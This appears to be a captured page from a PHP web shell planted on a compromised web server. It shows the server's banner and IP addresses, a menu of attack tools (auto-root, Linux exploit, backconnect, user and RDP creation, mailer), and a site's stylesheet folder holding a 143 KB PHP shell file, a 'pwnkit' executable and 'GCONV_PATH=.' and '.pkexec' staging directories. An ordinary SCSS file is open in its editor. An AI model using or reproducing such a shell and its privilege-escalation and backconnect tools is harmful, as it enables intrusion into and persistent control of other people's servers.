Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.138
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo5.com /
resources /
scss /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
avatar.scss
193
B
-rw-r--r--
btn.scss
2.31
KB
-rw-r--r--
cards.scss
586
B
-rw-r--r--
client.scss
385
B
-rw-r--r--
colors.scss
1.85
KB
-rw-r--r--
create-invoice.scss
3.68
KB
-rw-r--r--
custom.scss
19.1
KB
-rw-r--r--
custom_theme.scss
0
B
-rw-r--r--
dark-theme.scss
11.35
KB
-rw-r--r--
dashboard.scss
1.01
KB
-rw-r--r--
filter.scss
1.57
KB
-rw-r--r--
form.scss
4.78
KB
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
invoice.scss
3.52
KB
-rw-r--r--
labels.scss
98
B
-rw-r--r--
login.scss
1.78
KB
-rw-r--r--
main.scss
2.04
KB
-rw-r--r--
messages.scss
3.8
KB
-rw-r--r--
modal.scss
333
B
-rw-r--r--
pagination.scss
705
B
-rw-r--r--
project.scss
6.3
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
recruit.scss
1.34
KB
-rw-r--r--
rtl.scss
12.77
KB
-rw-r--r--
settings.scss
5.99
KB
-rw-r--r--
sidebar.scss
8.08
KB
-rw-r--r--
style.scss
921
B
-rw-r--r--
tables.scss
1.7
KB
-rw-r--r--
task-board.scss
2.04
KB
-rw-r--r--
task_list.scss
3.25
KB
-rw-r--r--
ticket.scss
3.33
KB
-rw-r--r--
typography.scss
1.1
KB
-rw-r--r--
ui_inventory.scss
2.51
KB
-rw-r--r--
variables.scss
551
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : filter.scss
.filter-box{ box-shadow: 0 1px 0 0 $grey; width: 100%; top: 63px; position: sticky; z-index: 1; @include media-breakpoint-down(md){ width: 100%; position: initial; } } .more-filters { border-left: solid 1px $grey; @include media-breakpoint-down(md){ border-left: 0px; } a{ line-height: 2; } .more-filter-tab{ background-color: $white; position: fixed; top: 62px; right: 0; z-index: 9; border: solid 1px $grey; white-space: nowrap; overflow-x: hidden; transform: translate3d(273px, 0, 0); height: 100%; width: 268px; transition: all ease-in 0.3s; .clear-all{ transition: all ease 0.3s; position: fixed; width: 100% !important; } h3{ line-height: 1.17; padding: 18px 28px 0; } label{ line-height: 1.14; padding: 0px 28px; margin-bottom: 12px; } } .more-filter-tab.in{ transform: translate3d(0px, 0, 0); transition: all ease-in 0.3s; width: 268px; .filter-detail{ height: calc(100vh - 197px); overflow-y: auto; overflow-x: hidden; } .clear-all{ // width: 268px; transition: width ease 0.3s; padding: 0px 28px; border-top: solid 1px $grey; button{ padding: 9px 11px; margin-right: 9px; } } } .filter-detail { height: calc(100vh - 197px); } } .close-more-filter{ position: absolute; right: 28px; top: 14px; &:hover{ color: $black; } } .select-filter { padding: 0px 28px; }
Close